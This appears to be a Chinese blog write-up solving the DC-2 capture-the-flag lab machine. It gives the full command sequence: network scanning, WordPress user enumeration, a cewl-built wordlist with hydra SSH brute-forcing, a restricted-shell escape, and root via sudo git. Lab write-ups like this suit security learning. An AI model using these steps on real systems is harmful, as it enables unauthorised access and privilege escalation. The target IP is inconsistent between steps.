DC-2
先扫描当前网段下的ip确定靶机。
nmap -sP 192.168.93.0/24
扫描靶机开放的端口
nmap -sV 192.168.93.152
发现开放80端口,用浏览器进行访问
发现ip地址被直接转成了dc-2,而且无法访问,页面显示无法解析出ip地址
进入kali下的/etc/hosts,在末尾加上192.168.93.152 dc-2即可。
再次访问页面,可以正常访问。
拿到flag1
这里再次用nmap进行扫描
nmap -sS -Pn -A -p 1-65535 192.168.239.152
发现还扫出来一个7744端口,运行了ssh服务。
flag1提示cewl,同时wordpress也是一种框架,可以寻找相关工具。
wpscan --url http://dc-2 --enumerate u#扫描关于wordpress的相关漏洞
发现了三个用户。
但并不知道密码,这里查询cewl用法,使用cewl生成密码。
cewl -w 555.txt http://dc-2
再将用户写入txt文件,开始准备爆破ssh用户。
hydra -L 444.txt -P 555.txt ssh://192.168.239.152 -s 7744 -vV指定7744端口ssh爆破用户名和密码,不过这个只能爆破出tom的密码,下面那个还可以爆出jerry的。
wpscan --url http://dc-2/ -e u -U 444.txt -P 555.txt #这个也能爆。
登陆tom用户:
ssh tom@192.168.239.152 -p 7744
发现是rbash,部分命令受限,绕过rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
ls
cat flag3.txt
su jerry
cd /home/jerry
ls
cat flag4.txt
根据提示联想git提权
sudo -l#查看sudo配置文件
sudo git help config#git提权
cd /root
ls
cat final-flag.txt
5330
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
